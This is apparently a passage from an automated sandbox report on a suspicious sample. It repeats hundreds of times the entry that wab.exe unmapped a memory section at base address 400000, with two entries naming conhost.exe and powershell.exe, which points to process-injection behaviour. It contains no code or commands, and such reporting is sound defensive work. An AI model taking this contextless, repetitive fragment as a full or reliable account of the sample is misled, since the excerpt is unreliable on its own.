Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: C:\Windows\System32\conhost.exe base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section unmapped: unknown base address: 400000	Jump to behavior
